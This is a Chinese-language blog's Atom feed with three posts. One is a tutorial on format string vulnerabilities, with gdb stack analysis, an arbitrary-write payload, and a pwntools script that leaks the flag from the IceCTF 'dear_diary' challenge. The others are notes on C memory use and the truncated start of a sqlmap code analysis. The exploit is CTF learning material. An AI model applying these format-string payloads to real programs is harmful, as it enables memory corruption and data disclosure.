-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathatom.xml
More file actions
1262 lines (1096 loc) · 293 KB
/
Copy pathatom.xml
File metadata and controls
1262 lines (1096 loc) · 293 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title><![CDATA[Edward_L's Blog]]></title>
<subtitle><![CDATA[活着就是为了折腾]]></subtitle>
<link href="/atom.xml" rel="self"/>
<link href="http://edward-l.github.io/"/>
<updated>2016-09-01T14:40:22.000Z</updated>
<id>http://edward-l.github.io/</id>
<author>
<name><![CDATA[Edward_L]]></name>
<email><![CDATA[linzhexi777@gmail.com]]></email>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title><![CDATA[格式化字符串漏洞]]></title>
<link href="http://edward-l.github.io/2016/09/01/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/"/>
<id>http://edward-l.github.io/2016/09/01/格式化字符串漏洞/</id>
<published>2016-09-01T13:30:16.000Z</published>
<updated>2016-09-01T14:40:22.000Z</updated>
<content type="html"><![CDATA[<h2 id="任意地址写">任意地址写</h2><p>学习了<a href="http://libc.pw/2015/07/29/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/" target="_blank" rel="external">z神的博客</a>之后对最后一个例子不是很理解,就进行了实践分析。<br>源程序<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="preprocessor">#<span class="keyword">include</span> <stdio.h></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span><br><span class="line"></span>{ </span><br><span class="line"><span class="keyword">int</span> flag = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> *p = &flag; </span><br><span class="line"><span class="keyword">char</span> a[<span class="number">100</span>];</span><br><span class="line"><span class="built_in">scanf</span>(<span class="string">"%s"</span>,a);</span><br><span class="line"><span class="built_in">printf</span>(a);</span><br><span class="line"><span class="keyword">if</span>(flag == <span class="number">2000</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"good!!\n"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>
<a id="more"></a>
<p>我们的目标是最后输出good!也就是说我们要改变flag的值。我们可以改变指向flag的指针p,来达到我们的目的。<br>首先我们需要知道我们现在读的位置,随手读取8个字节,我们可以看见结果如下,输出的8个字节为ffffce380000<br><figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ <span class="literal">r</span></span><br><span class="line">Starting <span class="keyword">program</span>: /home/<span class="keyword">ed</span>/Desktop/pwn/<span class="keyword">test</span>/<span class="keyword">test</span> </span><br><span class="line">%04x%04x</span><br><span class="line">ffffce380000[Inferior 1 (process 36916) exited normally]</span><br></pre></td></tr></table></figure></p>
<p>查看此时的栈<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x /30w $<span class="literal">esp</span></span><br><span class="line"><span class="number">0xffffce20</span>: <span class="number">0xffffce38</span> <span class="number">0xffffce38</span> <span class="number">0x00000000</span> <span class="number">0x00000000</span></span><br><span class="line"><span class="number">0xffffce30</span>: <span class="number">0x00000000</span> <span class="number">0xffffce30</span> <span class="number">0x30313025</span> <span class="number">0x31302578</span></span><br><span class="line"><span class="number">0xffffce40</span>: <span class="number">0x30257830</span> <span class="number">0x30253031</span> <span class="number">0x30373931</span> <span class="number">0x006e2578</span></span><br><span class="line"><span class="number">0xffffce50</span>: <span class="number">0xf7ffd938</span> <span class="number">0x00000000</span> <span class="number">0x000000c2</span> <span class="number">0xf7ea9716</span></span><br><span class="line"><span class="number">0xffffce60</span>: <span class="number">0xffffffff</span> <span class="number">0xffffce8e</span> <span class="number">0xf7e21c34</span> <span class="number">0xf7e47fe3</span></span><br><span class="line"><span class="number">0xffffce70</span>: <span class="number">0x00000000</span> <span class="number">0x00ca0000</span> <span class="number">0x00000001</span> <span class="number">0x000000c2</span></span><br><span class="line"><span class="number">0xffffce80</span>: <span class="number">0xffffd167</span> <span class="number">0x0000002f</span> <span class="number">0x0fabfbff</span> <span class="number">0x0804858b</span></span><br><span class="line"><span class="number">0xffffce90</span>: <span class="number">0x00000001</span> <span class="number">0xffffcf54</span></span><br></pre></td></tr></table></figure></p>
<p>我们可以发现此时的esp为<strong>0xffffce20</strong>,他是从esp+4开始打印的,接下来只要算出<em>p到开始答应的偏移地址我们就可以构造出payload,实现对flag的修改。<br>接下来我们去查看</em>p的位置<br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">0x80484fb</span> <main+<span class="number">64</span>>: <span class="keyword">lea</span> <span class="number">eax</span>,[<span class="literal">ebp</span>-<span class="number">0x70</span>]</span><br><span class="line"> <span class="number">0x80484fe</span> <main+<span class="number">67</span>>: <span class="keyword">push</span> <span class="number">eax</span></span><br><span class="line">=> <span class="number">0x80484ff</span> <main+<span class="number">68</span>>: <span class="keyword">call</span> <span class="number">0x8048370</span> <printf@plt></span><br><span class="line"> <span class="number">0x8048504</span> <main+<span class="number">73</span>>: <span class="keyword">add</span> <span class="literal">esp</span>,<span class="number">0x10</span></span><br><span class="line"> <span class="number">0x8048507</span> <main+<span class="number">76</span>>: <span class="keyword">mov</span> <span class="number">eax</span>,<span class="preprocessor">DWORD</span> <span class="preprocessor">PTR</span> [<span class="literal">ebp</span>-<span class="number">0x78</span>]</span><br><span class="line"> <span class="number">0x804850a</span> <main+<span class="number">79</span>>: <span class="keyword">cmp</span> <span class="number">eax</span>,<span class="number">0x7d0</span></span><br></pre></td></tr></table></figure></p>
<p>注意观察0x8048507 <main+76>,我们可以发现 <em>P的位置是DWORD PTR [ebp-0x78]<br>我们可以看到现在p在栈中的位置是**</em>0xffffce30<em>*</em>。<br><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda<span class="variable">$ </span>x /w <span class="variable">$ebp</span>-<span class="number">0x78</span></span><br><span class="line"><span class="number">0xffffce30</span><span class="symbol">:</span> <span class="number">0x00000000</span></span><br></pre></td></tr></table></figure></main+76></p>
<p>这样我们就可以构造payload,(0xffffce30-0xffffce20)/4我们只要构造出%010x%010x%010x%1970x%n就可以成功的把2000写入flag。<br><figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">root<span class="variable">@ed</span>-machine:/home/ed/Desktop/pwn/test# ./test</span><br><span class="line"><span class="variable">%010x</span><span class="variable">%010x</span><span class="variable">%010x</span><span class="variable">%01970x</span><span class="variable">%n</span></span><br><span class="line"><span class="number">00</span>ffffce780000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ok!</span><br></pre></td></tr></table></figure></p>
<h2 id="任意地址读">任意地址读</h2><p>这个我们可以借助2016 icectf的dear_diary这个题来理解<br>这个题的大致解题思路是这样的,首先把存在data中的flag的地址找到,并在第一次选择中选1.把这个地址写入。然后第二次选择还是选1,写入我们的payload,第三次选择中选2,把flag打印出来。<br>首先我们要找到falg在data中的地址,这个可以通过ida分析得到<strong><em>0x0804a0a0</em></strong>,然后我们要知道打印时esp的位置,和第一次写的位置,通过这两个地址我们就可以计算出偏移从而构造payload。要知道打印时的esp可以通过gdb在print这个地方下断点,查看esp的值,我们可以发现esp的值为<strong><em>0xffffba50</em></strong><br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">[----------------------------------registers-----------------------------------]</span><br><span class="line"><span class="number">EAX</span>: <span class="number">0xffffbb98</span> (<span class="string">"bbbb\n"</span>)</span><br><span class="line"><span class="number">EBX</span>: <span class="number">0xf7fbc000</span> --> <span class="number">0x1a6da8</span> </span><br><span class="line"><span class="number">ECX</span>: <span class="number">0xa</span> (<span class="string">'\n'</span>)</span><br><span class="line"><span class="number">EDX</span>: <span class="number">0x100</span> </span><br><span class="line"><span class="label">ESI:</span> <span class="number">0x0</span> </span><br><span class="line"><span class="label">EDI:</span> <span class="number">0x0</span> </span><br><span class="line"><span class="label">EBP:</span> <span class="number">0xffffba78</span> --> <span class="number">0xffffcea8</span> --> <span class="number">0x0</span> </span><br><span class="line"><span class="label">ESP:</span> <span class="number">0xffffba50</span> --> <span class="number">0xffffbb98</span> (<span class="string">"bbbb\n"</span>)</span><br><span class="line"><span class="label">EIP:</span> <span class="number">0x804873e</span> (<print_entry+<span class="number">29</span>>: <span class="keyword">call</span> <span class="number">0x8048490</span> <printf@plt>)</span><br><span class="line"><span class="label">EFLAGS:</span> <span class="number">0x246</span> (carry PARITY adjust <span class="preprocessor">ZERO</span> sign trap INTERRUPT direction overflow)</span><br><span class="line">[-------------------------------------code-------------------------------------]</span><br><span class="line"> <span class="number">0x8048736</span> <print_entry+<span class="number">21</span>>: <span class="keyword">xor</span> <span class="number">eax</span>,<span class="number">eax</span></span><br><span class="line"> <span class="number">0x8048738</span> <print_entry+<span class="number">23</span>>: <span class="keyword">mov</span> <span class="number">eax</span>,<span class="preprocessor">DWORD</span> <span class="preprocessor">PTR</span> [<span class="literal">ebp</span>-<span class="number">0x1c</span>]</span><br><span class="line"> <span class="number">0x804873b</span> <print_entry+<span class="number">26</span>>: <span class="keyword">mov</span> <span class="preprocessor">DWORD</span> <span class="preprocessor">PTR</span> [<span class="literal">esp</span>],<span class="number">eax</span></span><br><span class="line">=> <span class="number">0x804873e</span> <print_entry+<span class="number">29</span>>: <span class="keyword">call</span> <span class="number">0x8048490</span> <printf@plt></span><br><span class="line"> <span class="number">0x8048743</span> <print_entry+<span class="number">34</span>>: <span class="keyword">mov</span> <span class="number">eax</span>,<span class="literal">ds</span>:<span class="number">0x804a080</span></span><br><span class="line"> <span class="number">0x8048748</span> <print_entry+<span class="number">39</span>>: <span class="keyword">mov</span> <span class="preprocessor">DWORD</span> <span class="preprocessor">PTR</span> [<span class="literal">esp</span>],<span class="number">eax</span></span><br><span class="line"> <span class="number">0x804874b</span> <print_entry+<span class="number">42</span>>: <span class="keyword">call</span> <span class="number">0x80484a0</span> <fflush@plt></span><br><span class="line"> <span class="number">0x8048750</span> <print_entry+<span class="number">47</span>>: <span class="keyword">mov</span> <span class="number">eax</span>,<span class="preprocessor">DWORD</span> <span class="preprocessor">PTR</span> [<span class="literal">ebp</span>-<span class="number">0xc</span>]</span><br><span class="line">Guessed arguments:</span><br><span class="line">arg[<span class="number">0</span>]: <span class="number">0xffffbb98</span> (<span class="string">"bbbb\n"</span>)</span><br><span class="line">[------------------------------------stack-------------------------------------]</span><br><span class="line"><span class="number">0000</span>| <span class="number">0xffffba50</span> --> <span class="number">0xffffbb98</span> (<span class="string">"bbbb\n"</span>)</span><br><span class="line"><span class="number">0004</span>| <span class="number">0xffffba54</span> --> <span class="number">0xf7e49316</span> (<strtol+<span class="number">6</span>>: <span class="keyword">add</span> <span class="number">ebx</span>,<span class="number">0x172cea</span>)</span><br><span class="line"><span class="number">0008</span>| <span class="number">0xffffba58</span> --> <span class="number">0xf7fbc000</span> --> <span class="number">0x1a6da8</span> </span><br><span class="line"><span class="number">0012</span>| <span class="number">0xffffba5c</span> --> <span class="number">0xffffbb98</span> (<span class="string">"bbbb\n"</span>)</span><br><span class="line"><span class="number">0016</span>| <span class="number">0xffffba60</span> --> <span class="number">0xffffce98</span> --> <span class="number">0x8000a32</span> </span><br><span class="line"><span class="number">0020</span>| <span class="number">0xffffba64</span> --> <span class="number">0x0</span> </span><br><span class="line"><span class="number">0024</span>| <span class="number">0xffffba68</span> --> <span class="number">0xa</span> (<span class="string">'\n'</span>)</span><br><span class="line"><span class="number">0028</span>| <span class="number">0xffffba6c</span> --> <span class="number">0x59573600</span> (<span class="string">'')</span><br><span class="line">[------------------------------------------------------------------------------]</span></span><br></pre></td></tr></table></figure></p>
<p>查看栈的情况,我们可以找到第一次写入的位置为<strong><em>0xffffba98</em></strong><br><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x /20xw $<span class="literal">esp</span></span><br><span class="line"><span class="number">0xffffba80</span>: <span class="number">0xffffbc98</span> <span class="number">0x00000004</span> <span class="number">0xf7fbcc20</span> <span class="number">0x00000000</span></span><br><span class="line"><span class="number">0xffffba90</span>: <span class="number">0x00000000</span> <span class="number">0x00000003</span> <span class="number">0x61616161</span> <span class="number">0x0000000a</span></span><br><span class="line"><span class="number">0xffffbaa0</span>: <span class="number">0x00000000</span> <span class="number">0x00000000</span> <span class="number">0x00000000</span> <span class="number">0x00000000</span></span><br></pre></td></tr></table></figure></p>
<p>接下来就可以构造完整的payload了。下面是我的脚本<br><figure class="highlight coffeescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">from pwn <span class="reserved">import</span> *</span><br><span class="line">choise1 = <span class="string">"1"</span></span><br><span class="line">choise2 = <span class="string">"2"</span></span><br><span class="line">choise3 = <span class="string">"3"</span></span><br><span class="line"></span><br><span class="line">t = process(<span class="string">"./dear_diary"</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> t.recvuntil(<span class="string">">"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">######</span><span class="comment">#### choise1 ###</span><span class="comment">######</span><span class="comment">######</span><span class="comment">###</span><br><span class="line">print choise1</span><br><span class="line">t.sendline(choise1)</span><br><span class="line">print t.recvuntil(":")</span><br><span class="line">payload = 0x0804a0a0</span><br><span class="line">print p32(payload)</span><br><span class="line">t.sendline(p32(payload))</span><br><span class="line">print t.recvuntil(">")</span><br><span class="line"></span><br><span class="line">###</span><span class="comment">######</span><span class="comment">##choise2 ################</span></span><br><span class="line"><span class="built_in">print</span> choise2</span><br><span class="line">t.sendline(choise2)</span><br><span class="line"><span class="built_in">print</span> t.recvuntil(<span class="string">">"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">######</span><span class="comment">####choise1 ###</span><span class="comment">######</span><span class="comment">######</span><span class="comment">##</span></span><br><span class="line"><span class="built_in">print</span> choise1</span><br><span class="line">t.sendline(choise1)</span><br><span class="line"><span class="built_in">print</span> t.recvuntil(<span class="string">":"</span>)</span><br><span class="line">addr1 = <span class="number">0xffffba50</span></span><br><span class="line">addr2 = <span class="number">0xffffba98</span></span><br><span class="line">p = (addr2-addr1)/<span class="number">4</span>-<span class="number">1</span></span><br><span class="line">payload = <span class="string">"%08x"</span>*p+<span class="string">"%s"</span></span><br><span class="line"><span class="built_in">print</span> payload</span><br><span class="line">t.sendline(payload)</span><br><span class="line"><span class="built_in">print</span> t.recvuntil(<span class="string">">"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">######</span><span class="comment">###choise2###</span><span class="comment">######</span><span class="comment">######</span><span class="comment">##</span></span><br><span class="line"><span class="built_in">print</span> choise2</span><br><span class="line">t.sendline(choise2)</span><br><span class="line"><span class="built_in">print</span> t.recvuntil(<span class="string">">"</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">######</span><span class="comment">####choise3###</span><span class="comment">######</span><span class="comment">#####</span><br><span class="line">print choise3</span><br><span class="line">t.sendline(choise3)</span></span><br></pre></td></tr></table></figure></p>
]]></content>
<summary type="html">
<![CDATA[<h2 id="任意地址写">任意地址写</h2><p>学习了<a href="http://libc.pw/2015/07/29/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/">z神的博客</a>之后对最后一个例子不是很理解,就进行了实践分析。<br>源程序<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="preprocessor">#<span class="keyword">include</span> <stdio.h></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span><br><span class="line"></span>{ </span><br><span class="line"><span class="keyword">int</span> flag = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">int</span> *p = &flag; </span><br><span class="line"><span class="keyword">char</span> a[<span class="number">100</span>];</span><br><span class="line"><span class="built_in">scanf</span>(<span class="string">"%s"</span>,a);</span><br><span class="line"><span class="built_in">printf</span>(a);</span><br><span class="line"><span class="keyword">if</span>(flag == <span class="number">2000</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"good!!\n"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p>]]>
</summary>
<category term="格式化字符串漏洞,icectf,dear_diary" scheme="http://edward-l.github.io/tags/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%EF%BC%8Cicectf%EF%BC%8Cdear-diary/"/>
<category term="binary" scheme="http://edward-l.github.io/categories/binary/"/>
</entry>
<entry>
<title><![CDATA[c是怎么使用内存的]]></title>
<link href="http://edward-l.github.io/2016/08/18/c%E6%98%AF%E6%80%8E%E4%B9%88%E4%BD%BF%E7%94%A8%E5%86%85%E5%AD%98%E7%9A%84/"/>
<id>http://edward-l.github.io/2016/08/18/c是怎么使用内存的/</id>
<published>2016-08-18T03:30:16.000Z</published>
<updated>2016-09-01T14:33:13.000Z</updated>
<content type="html"><![CDATA[<blockquote>
<p>指针类型(point type)可由函数类型,对象类型或不完全的类型派生,派生指针类型的类型称为引用类型。指针类型描述一个对象,该类对象的值提供对该引用类型实体的引用。有引用类型T派生的指针类型有时称为“(指向)T的指针”。从引用类型构造指针类型的过程称为“指针类型的派生”。这些构造派生类型的方法可以递归的应用。</p>
</blockquote>
<a id="more"></a>
<p>对指针加N,指针前进“当前指针指向的数据类型的长度*N”</p>
<p>空指针是指可以确保没有指向任何一个对象的指针。他和任何非空指针进行比较都不会相等,因此常用作函数发生异常时的返回值使用。</p>
<p>fflush()是对输出流使用的,他不能用于输入流。标准中并没有定义用于输入流的fflush()的行为。</p>
<p><code>静态存储期</code>,全局变量,文件内的static宾亮,指定static的局部变量都持有静态存储期,这些变量也称为静态变量。它的寿命从程序运行开始,到程序关闭结束。换句话说,静态变量一直存储在内存的同一地址上</p>
<p><code>自动存储期</code>,没有指定static的局部变量,称为自动变量。在进入他所在的语句时被分配内存,语句结束后内存释放</p>
<p>通过malloc()分配的领域,寿命到free()为止</p>
<p>自动变量重复使用内存区域,因此自动变量的地址是不一定的。</p>
<p>c语言中通常将自动变量保存在栈中。内存区域可以被重复利用,节约内存。可以实现递归调用。</p>
<p>在调用函数时,参数从后往前按顺序被堆积在栈中。</p>
<p>malloc()根据参数指定的尺寸来分配内存块,他返回指向内存块初始位置的指针,经常被用于动态分配结构体的内存领域,分配前不知道大小的数组的内存领域等。<br><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">p</span> = <span class="function"><span class="title">malloc</span><span class="params">(size)</span></span></span><br><span class="line"><span class="function"><span class="title">free</span><span class="params">(p)</span></span></span><br></pre></td></tr></table></figure></p>
<p>像这样能够动态进行内存分配,并且可以通过任意的顺序释放的记忆区域,称为堆(heap)</p>
<p>malloc()不是系统调用</p>
<p>malloc()是通过链表来实现的,malloc()遍历链表寻找空的块,如果发现尺寸大小能够满足的块,就分割出来将其变成使用中的块,并向应用程序返回紧邻管理区域的后面区域的地址。free()将管理区域的标记改写成空块,顺便将上下空的块合并成一个块,这样可以防止块的碎片化。<br>如果不存在足够大的空块,就请求操作系统对空间进行扩容,unix下使用brk()系统调用。<br>malloc()绝对不是魔法函数。</p>
]]></content>
<summary type="html">
<![CDATA[<blockquote>
<p>指针类型(point type)可由函数类型,对象类型或不完全的类型派生,派生指针类型的类型称为引用类型。指针类型描述一个对象,该类对象的值提供对该引用类型实体的引用。有引用类型T派生的指针类型有时称为“(指向)T的指针”。从引用类型构造指针类型的过程称为“指针类型的派生”。这些构造派生类型的方法可以递归的应用。</p>
</blockquote>]]>
</summary>
<category term="c,cache,pointer" scheme="http://edward-l.github.io/tags/c%EF%BC%8Ccache%EF%BC%8Cpointer/"/>
<category term="c" scheme="http://edward-l.github.io/categories/c/"/>
</entry>
<entry>
<title><![CDATA[sqlmap源码分析(一)sqlmap.py]]></title>
<link href="http://edward-l.github.io/2016/05/11/sqlmap%E6%BA%90%E7%A0%81%E5%88%86%E6%9E%90(%E4%B8%80)sqlmap.py/"/>
<id>http://edward-l.github.io/2016/05/11/sqlmap源码分析(一)sqlmap.py/</id>
<published>2016-05-11T03:30:16.000Z</published>
<updated>2016-05-11T03:23:18.000Z</updated>
<content type="html"><![CDATA[<h2 id="sqlmap-py源码">sqlmap.py源码</h2><a id="more"></a>
